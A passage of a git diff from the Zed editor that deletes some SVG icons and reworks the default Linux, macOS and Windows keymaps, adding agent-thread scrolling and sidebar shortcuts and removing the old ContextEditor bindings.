d22e9d8c7da9ba04fe194339d787e40637cf5257..0000000000000000000000000000000000000000 --- a/assets/icons/tool_read.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/assets/icons/tool_regex.svg b/assets/icons/tool_regex.svg deleted file mode 100644 index 818c2ba360bc5aca3d4a7bf8ab65a03a2efe235e..0000000000000000000000000000000000000000 --- a/assets/icons/tool_regex.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/workspace_nav_closed.svg b/assets/icons/workspace_nav_closed.svg deleted file mode 100644 index ed1fce52d6826a4d10299f331358ff84e4caa973..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_closed.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/workspace_nav_open.svg b/assets/icons/workspace_nav_open.svg deleted file mode 100644 index 464b6aac73c2aeaa9463a805aabc4559377bbfd3..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_open.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index 9b8f2d337b1f1073bca818cf0b9c66773a3ce4e9..5ecca68e0404b400af2c285dc51df0a65d6fe07a 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -31,7 +31,6 @@ "ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -149,7 +148,6 @@ "ctrl-f": "buffer_search::Deploy", "ctrl-h": "buffer_search::DeployReplace", "ctrl->": "agent::AddSelectionToThread", - "ctrl-<": "assistant::InsertIntoEditor", "ctrl-alt-e": "editor::SelectEnclosingSymbol", "ctrl-shift-backspace": "editor::GoToPreviousChange", "ctrl-shift-alt-backspace": "editor::GoToNextChange", @@ -186,7 +184,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + 
"context": "Editor && jupyter", "bindings": { "ctrl-shift-enter": "repl::Run", "ctrl-alt-enter": "repl::RunInPlace", @@ -204,6 +202,7 @@ { "context": "Editor && editor_agent_diff", "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -214,35 +213,17 @@ { "context": "AgentDiff", "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", "shift-alt-z": "agent::RejectAll", }, }, - { - "context": "ContextEditor > Editor", - "bindings": { - "ctrl-enter": "assistant::Assist", - "ctrl-s": "workspace::Save", - "save": "workspace::Save", - "ctrl-<": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": "assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "ctrl-k c": "assistant::CopyCode", - "ctrl-g": "search::SelectNextMatch", - "ctrl-shift-g": "search::SelectPreviousMatch", - "ctrl-k l": "agent::OpenRulesLibrary", - "ctrl-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "bindings": { "ctrl-n": "agent::NewThread", - "ctrl-alt-n": "agent::NewTextThread", "ctrl-shift-h": "agent::OpenHistory", "ctrl-alt-c": "agent::OpenSettings", "ctrl-alt-p": "agent::ManageProfiles", @@ -253,16 +234,20 @@ "alt-tab": "agent::CycleFavoriteModels", // `alt-l` is provided as an alternative to `alt-tab` as the latter breaks on Linux under the `AgentPanel` context "alt-l": "agent::CycleFavoriteModels", - "ctrl-shift-j": "agent::ToggleNavigationMenu", - "ctrl-alt-i": "agent::ToggleOptionsMenu", + "shift-alt-j": "agent::ToggleNavigationMenu", + "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-alt-shift-n": "agent::ToggleNewThreadMenu", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl->": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", "ctrl-shift-enter": 
"agent::ContinueThread", - "ctrl-y": "agent::AllowOnce", + "shift-alt-q": "agent::AllowAlways", + "shift-alt-a": "agent::AllowOnce", "ctrl-alt-a": "agent::OpenPermissionDropdown", - "ctrl-alt-z": "agent::RejectOnce", + "shift-alt-x": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -273,13 +258,6 @@ "ctrl-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "bindings": { - "ctrl-n": "agent::NewTextThread", - "ctrl-alt-t": "agent::NewThread", - }, - }, { "context": "AgentPanel && acp_thread", "use_key_equivalents": true, @@ -306,12 +284,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", 
+ "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", "ctrl-shift-r": "agent::OpenAgentDiff", "ctrl-shift-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -336,6 +338,13 @@ "ctrl-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -388,6 +397,14 @@ "ctrl-enter": "search::ReplaceAll", }, }, + { + "context": "BufferSearchBar && !in_replace > Editor", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, { "context": "BufferSearchBar && !in_replace > Editor", "bindings": { @@ -421,6 +438,12 @@ "ctrl-alt-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "bindings": { @@ -575,6 +598,7 @@ // Change the default action on `menu::Confirm` by setting the parameter // "alt-ctrl-o": ["projects::OpenRecent", { "create_new_window": true }], "alt-ctrl-o": ["projects::OpenRecent", { "create_new_window": false }], + "ctrl-r": ["projects::OpenRecent", { "create_new_window": false }], "alt-shift-open": ["projects::OpenRemote", { "from_existing_connection": false, "create_new_window": false }], // Change to open path modal for existing remote connection by setting the parameter // "alt-ctrl-shift-o": "["projects::OpenRemote", { "from_existing_connection": true }]", @@ -621,6 +645,7 @@ "ctrl-shift-t": "pane::ReopenClosedItem", "ctrl-k ctrl-s": "zed::OpenKeymap", "ctrl-k ctrl-t": "theme_selector::Toggle", + "ctrl-k ctrl-shift-t": "theme::ToggleMode", "ctrl-alt-super-p": "settings_profile_selector::Toggle", "ctrl-t": "project_symbols::Toggle", "ctrl-p": "file_finder::Toggle", @@ -667,10 +692,32 @@ }, }, { - "context": 
"WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "ctrl-n": "multi_workspace::NewWorkspaceInWindow", + "ctrl-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "ctrl-f": "agents_sidebar::FocusSidebarFilter", + "ctrl-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -760,18 +807,14 @@ "bindings": { "alt-tab": "editor::AcceptEditPrediction", "alt-l": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "alt-k": "editor::AcceptNextWordEditPrediction", "alt-j": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "alt-l": "editor::AcceptEditPrediction", - "alt-k": "editor::AcceptNextWordEditPrediction", - "alt-j": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -813,7 +856,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "bindings": { "alt-enter": "editor::OpenExcerpts", "shift-enter": "editor::ExpandExcerpts", @@ -889,6 +932,8 @@ "ctrl-alt-c": "project_panel::CopyPath", "alt-shift-copy": "workspace::CopyRelativePath", "alt-ctrl-shift-c": "workspace::CopyRelativePath", + "undo": 
"project_panel::Undo", + "ctrl-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -913,7 +958,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "bindings": { "left": "git_panel::CollapseSelectedEntry", "right": "git_panel::ExpandSelectedEntry", @@ -977,6 +1022,7 @@ "ctrl-shift-enter": "git::Amend", "ctrl-space": "git::StageAll", "ctrl-shift-space": "git::UnstageAll", + "ctrl-k ctrl-r": "git::RestoreAndNext", }, }, { @@ -1041,6 +1087,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1101,6 +1148,8 @@ "bindings": { "ctrl-k": "recent_projects::ToggleActionsMenu", "ctrl-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "ctrl-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1225,6 +1274,10 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "ctrl-home": "markdown::ScrollToTop", + "ctrl-end": "markdown::ScrollToBottom", + "find": "buffer_search::Deploy", + "ctrl-f": "buffer_search::Deploy", }, }, { @@ -1310,6 +1363,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "ctrl-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "ctrl-,": "zed::OpenSettings", }, }, { @@ -1429,8 +1492,8 @@ { "context": "GitPicker", "bindings": { - "alt-1": "git_picker::ActivateBranchesTab", - "alt-2": "git_picker::ActivateWorktreesTab", + "alt-1": 
"git_picker::ActivateWorktreesTab", + "alt-2": "git_picker::ActivateBranchesTab", "alt-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-macos.json b/assets/keymaps/default-macos.json index 5f210cb4da35f9909767035c941289ee24a2ee3f..c74b5900001a2c798076783b2741aba84ffc4b15 100644 --- a/assets/keymaps/default-macos.json +++ b/assets/keymaps/default-macos.json @@ -39,7 +39,6 @@ "cmd-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "cmd--": ["zed::DecreaseBufferFontSize", { "persist": false }], "cmd-0": ["zed::ResetBufferFontSize", { "persist": false }], - "cmd-,": "zed::OpenSettings", "cmd-alt-,": "zed::OpenSettingsFile", "cmd-q": "zed::Quit", "cmd-h": "zed::Hide", @@ -174,7 +173,6 @@ "cmd-alt-l": ["buffer_search::Deploy", { "selection_search_enabled": true }], "cmd-e": ["buffer_search::Deploy", { "focus": false }], "cmd->": "agent::AddSelectionToThread", - "cmd-<": "assistant::InsertIntoEditor", "cmd-alt-e": "editor::SelectEnclosingSymbol", "alt-enter": "editor::OpenSelectionsInMultibuffer", }, @@ -221,7 +219,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + "context": "Editor && jupyter", "use_key_equivalents": true, "bindings": { "ctrl-shift-enter": "repl::Run", @@ -242,6 +240,7 @@ "context": "AgentDiff", "use_key_equivalents": true, "bindings": { + "cmd-y": "agent::Keep", "cmd-alt-y": "agent::Keep", "cmd-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -252,6 +251,7 @@ "context": "Editor && editor_agent_diff", "use_key_equivalents": true, "bindings": { + "cmd-y": "agent::Keep", "cmd-alt-y": "agent::Keep", "cmd-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -259,31 +259,11 @@ "shift-ctrl-r": "agent::OpenAgentDiff", }, }, - { - "context": "ContextEditor > Editor", - "use_key_equivalents": true, - "bindings": { - "cmd-enter": "assistant::Assist", - "cmd-s": "workspace::Save", - "cmd-<": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": 
"assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "cmd-k c": "assistant::CopyCode", - "cmd-g": "search::SelectNextMatch", - "cmd-shift-g": "search::SelectPreviousMatch", - "cmd-k l": "agent::OpenRulesLibrary", - "alt-tab": "agent::CycleFavoriteModels", - "cmd-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "use_key_equivalents": true, "bindings": { "cmd-n": "agent::NewThread", - "cmd-alt-n": "agent::NewTextThread", "cmd-shift-h": "agent::OpenHistory", "cmd-alt-c": "agent::OpenSettings", "cmd-alt-l": "agent::OpenRulesLibrary", @@ -295,6 +275,7 @@ "cmd-shift-j": "agent::ToggleNavigationMenu", "cmd-alt-m": "agent::ToggleOptionsMenu", "cmd-alt-shift-n": "agent::ToggleNewThreadMenu", + "cmd-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "cmd->": "agent::AddSelectionToThread", "cmd-shift-e": "project_panel::ToggleFocus", @@ -302,6 +283,8 @@ "cmd-y": "agent::AllowOnce", "cmd-alt-a": "agent::OpenPermissionDropdown", "cmd-alt-z": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -311,14 +294,6 @@ "cmd-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "use_key_equivalents": true, - "bindings": { - "cmd-n": "agent::NewTextThread", - "cmd-alt-n": "agent::NewExternalAgentThread", - }, - }, { "context": "AgentPanel && acp_thread", "use_key_equivalents": true, @@ -352,12 +327,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + 
"ctrl-pageup": "agent::ScrollOutputPageUp", + "ctrl-pagedown": "agent::ScrollOutputPageDown", + "ctrl-home": "agent::ScrollOutputToTop", + "ctrl-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-pageup": "agent::ScrollOutputPageUp", + "ctrl-pagedown": "agent::ScrollOutputPageDown", + "ctrl-home": "agent::ScrollOutputToTop", + "ctrl-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-pagedown": "agent::ScrollOutputToNextMessage", "shift-ctrl-r": "agent::OpenAgentDiff", "shift-ctrl-d": "git::Diff", "shift-alt-y": "agent::KeepAll", @@ -380,6 +379,13 @@ "cmd-alt-.": "agent::ToggleFastMode", }, }, + { + "context": "AcpThread > Editor && mode == full", + "use_key_equivalents": true, + "bindings": { + "alt-enter": "editor::OpenExcerpts", + }, + }, { "context": "AcpThread > Editor && !use_modifier_to_send", "use_key_equivalents": true, @@ -443,11 +449,25 @@ { "context": "BufferSearchBar && !in_replace > Editor", "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + "shift-enter": "search::SelectPreviousMatch", + }, + }, + { + "context": "BufferSearchBar && !in_replace > Editor", "bindings": { "up": "search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", }, }, + { + "context": "BufferSearchBar || ProjectSearchBar", + "use_key_equivalents": true, + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchBar", "use_key_equivalents": true, @@ -463,7 +483,6 @@ }, { "context": "ProjectSearchBar > Editor", - "use_key_equivalents": true, "bindings": { "up": 
"search::PreviousHistoryQuery", "down": "search::NextHistoryQuery", @@ -477,6 +496,12 @@ "cmd-enter": "search::ReplaceAll", }, }, + { + "context": "ProjectSearchBar && !in_replace > Editor", + "bindings": { + "ctrl-enter": "editor::Newline", + }, + }, { "context": "ProjectSearchView", "use_key_equivalents": true, @@ -643,6 +668,7 @@ // Change the default action on `menu::Confirm` by setting the parameter // "alt-cmd-o": ["projects::OpenRecent", {"create_new_window": true }], "alt-cmd-o": ["projects::OpenRecent", { "create_new_window": false }], + "ctrl-r": ["projects::OpenRecent", { "create_new_window": false }], "ctrl-cmd-o": ["projects::OpenRemote", { "from_existing_connection": false, "create_new_window": false }], "ctrl-cmd-shift-o": ["projects::OpenRemote", { "from_existing_connection": true, "create_new_window": false }], "cmd-ctrl-b": "branches::OpenRecent", @@ -681,6 +707,7 @@ "cmd-shift-t": "pane::ReopenClosedItem", "cmd-k cmd-s": "zed::OpenKeymap", "cmd-k cmd-t": "theme_selector::Toggle", + "cmd-k cmd-shift-t": "theme::ToggleMode", "ctrl-alt-cmd-p": "settings_profile_selector::Toggle", "cmd-t": "project_symbols::Toggle", "cmd-p": "file_finder::Toggle", @@ -728,10 +755,32 @@ }, }, { - "context": "WorkspaceSidebar", + "context": "ThreadsSidebar", "use_key_equivalents": true, "bindings": { - "cmd-n": "multi_workspace::NewWorkspaceInWindow", + "cmd-n": "agents_sidebar::NewThreadInGroup", + "left": "menu::SelectParent", + "right": "menu::SelectChild", + "enter": "menu::Confirm", + "cmd-f": "agents_sidebar::FocusSidebarFilter", + "cmd-g": "agents_sidebar::ToggleArchive", + "shift-backspace": "agent::RemoveSelectedThread", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], + }, + }, + { + "context": "ThreadsSidebar && not_searching", + "use_key_equivalents": true, + "bindings": { + "space": "menu::Confirm", + }, + }, + { + "context": "ThreadSwitcher", + "bindings": { + 
"ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -817,18 +866,14 @@ "context": "Editor && edit_prediction", "bindings": { "alt-tab": "editor::AcceptEditPrediction", - "tab": "editor::AcceptEditPrediction", "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", }, }, { - "context": "Editor && edit_prediction_conflict", - "use_key_equivalents": true, + "context": "Editor && edit_prediction && edit_prediction_mode == eager && !showing_completions", "bindings": { - "alt-tab": "editor::AcceptEditPrediction", - "ctrl-cmd-right": "editor::AcceptNextWordEditPrediction", - "ctrl-cmd-down": "editor::AcceptNextLineEditPrediction", + "tab": "editor::AcceptEditPrediction", }, }, { @@ -869,7 +914,7 @@ }, }, { - "context": "!ContextEditor > Editor && mode == full", + "context": "!AcpThread > Editor && mode == full", "use_key_equivalents": true, "bindings": { "alt-enter": "editor::OpenExcerpts", @@ -943,6 +988,7 @@ "cmd-v": "project_panel::Paste", "cmd-alt-c": "workspace::CopyPath", "alt-cmd-shift-c": "workspace::CopyRelativePath", + "cmd-z": "project_panel::Undo", "enter": "project_panel::Rename", "f2": "project_panel::Rename", "backspace": ["project_panel::Trash", { "skip_prompt": false }], @@ -981,7 +1027,7 @@ }, }, { - "context": "GitPanel && ChangesList", + "context": "GitPanel && ChangesList && !GitBranchSelector", "use_key_equivalents": true, "bindings": { "up": "git_panel::PreviousEntry", @@ -1021,6 +1067,7 @@ "cmd-shift-enter": "git::Amend", "cmd-ctrl-y": "git::StageAll", "cmd-ctrl-shift-y": "git::UnstageAll", + "cmd-alt-z": "git::RestoreAndNext", }, }, { @@ -1098,6 +1145,7 @@ "alt-up": "collab_panel::MoveChannelUp", "alt-down": "collab_panel::MoveChannelDown", "alt-enter": "collab_panel::OpenSelectedChannelNotes", + "shift-enter": "collab_panel::ToggleSelectedChannelFavorite", }, }, { @@ -1165,6 +1213,8 @@ 
"bindings": { "cmd-k": "recent_projects::ToggleActionsMenu", "cmd-shift-a": "workspace::AddFolderToProject", + "shift-backspace": "recent_projects::RemoveSelected", + "cmd-shift-enter": "recent_projects::AddToWorkspace", }, }, { @@ -1324,6 +1374,9 @@ "down": "markdown::ScrollDown", "alt-up": "markdown::ScrollUpByItem", "alt-down": "markdown::ScrollDownByItem", + "cmd-up": "markdown::ScrollToTop", + "cmd-down": "markdown::ScrollToBottom", + "cmd-f": "buffer_search::Deploy", }, }, { @@ -1408,6 +1461,16 @@ "bindings": { "ctrl-shift-space": "git::WorktreeFromDefaultOnWindow", "ctrl-space": "git::WorktreeFromDefault", + "cmd-shift-backspace": "git::DeleteWorktree", + }, + }, + { + // Handled under a more specific context to avoid conflicts with the + // `OpenCurrentFile` keybind from the settings UI + "context": "!SettingsWindow", + "use_key_equivalents": true, + "bindings": { + "cmd-,": "zed::OpenSettings", }, }, { @@ -1500,8 +1563,8 @@ { "context": "GitPicker", "bindings": { - "cmd-1": "git_picker::ActivateBranchesTab", - "cmd-2": "git_picker::ActivateWorktreesTab", + "cmd-1": "git_picker::ActivateWorktreesTab", + "cmd-2": "git_picker::ActivateBranchesTab", "cmd-3": "git_picker::ActivateStashTab", }, }, diff --git a/assets/keymaps/default-windows.json b/assets/keymaps/default-windows.json index 19f75f858cd45192c4cf30dd6bd0799046c26268..a9eb3933423ff60fe60ac391b12773ce7146fb0d 100644 --- a/assets/keymaps/default-windows.json +++ b/assets/keymaps/default-windows.json @@ -30,7 +30,6 @@ "ctrl-shift-=": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -144,7 +143,6 @@ "ctrl-f": "buffer_search::Deploy", "ctrl-h": "buffer_search::DeployReplace", "ctrl-shift-.": "agent::AddSelectionToThread", - "ctrl-shift-,": 
"assistant::InsertIntoEditor", "shift-alt-e": "editor::SelectEnclosingSymbol", "ctrl-shift-backspace": "editor::GoToPreviousChange", "ctrl-shift-alt-backspace": "editor::GoToNextChange", @@ -183,7 +181,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + "context": "Editor && jupyter", "use_key_equivalents": true, "bindings": { "ctrl-shift-enter": "repl::Run", @@ -203,6 +201,7 @@ "context": "Editor && editor_agent_diff", "use_key_equivalents": true, "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -214,36 +213,18 @@ "context": "AgentDiff", "use_key_equivalents": true, "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", "shift-alt-z": "agent::RejectAll", }, }, - { - "context": "ContextEditor > Editor", - "use_key_equivalents": true, - "bindings": { - "ctrl-i": "assistant::Assist", - "ctrl-s": "workspace::Save", - "ctrl-shift-,": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": "assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "ctrl-k c": "assistant::CopyCode", - "ctrl-g": "search::SelectNextMatch", - "ctrl-shift-g": "search::SelectPreviousMatch", - "ctrl-k l": "agent::OpenRulesLibrary", - "ctrl-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "use_key_equivalents": true, "bindings": { "ctrl-n": "agent::NewThread", - "shift-alt-n": "agent::NewTextThread", "ctrl-shift-h": "agent::OpenHistory", "shift-alt-c": "agent::OpenSettings", "shift-alt-l": "agent::OpenRulesLibrary", @@ -257,13 +238,17 @@ "shift-alt-j": "agent::ToggleNavigationMenu", "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-shift-alt-n": "agent::ToggleNewThreadMenu", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl-shift-.": "agent::AddSelectionToThread", "ctrl-shift-e": 
"project_panel::ToggleFocus", "ctrl-shift-enter": "agent::ContinueThread", + "shift-alt-q": "agent::AllowAlways", "shift-alt-a": "agent::AllowOnce", "ctrl-alt-a": "agent::OpenPermissionDropdown", - "shift-alt-z": "agent::RejectOnce", + "shift-alt-x": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -273,14 +258,6 @@ "ctrl-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "use_key_equivalents": true, - "bindings": { - "ctrl-n": "agent::NewTextThread", - "ctrl-alt-t": "agent::NewThread", - }, - }, { "context": "AgentPanel && acp_thread", "use_key_equivalents": true, @@ -308,12 +285,36 @@ "context": "AcpThread", "bindings": { "ctrl--": "pane::GoBack", + "pageup": "agent::ScrollOutputPageUp", + "pagedown": "agent::ScrollOutputPageDown", + "home": "agent::ScrollOutputToTop", + "end": "agent::ScrollOutputToBottom", + "up": "agent::ScrollOutputLineUp", + "down": "agent::ScrollOutputLineDown", + "shift-pageup": "agent::ScrollOutputToPreviousMessage", + "shift-pagedown": "agent::ScrollOutputToNextMessage", + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + "ctrl-alt-shift-pageup": "agent::ScrollOutputToPreviousMessage", + "ctrl-alt-shift-pagedown": "agent::ScrollOutputToNextMessage", }, }, { "context": "AcpThread > Editor", "use_key_equivalents": true, "bindings": { + "ctrl-alt-pageup": "agent::ScrollOutputPageUp", + "ctrl-alt-pagedown": "agent::ScrollOutputPageDown", + "ctrl-alt-home": "agent::ScrollOutputToTop", + "ctrl-alt-end": "agent::ScrollOutputToBottom", + "ctrl-alt-up": "agent::ScrollOutputLineUp", + "ctrl-alt-down": "agent::ScrollOutputLineDown", + 
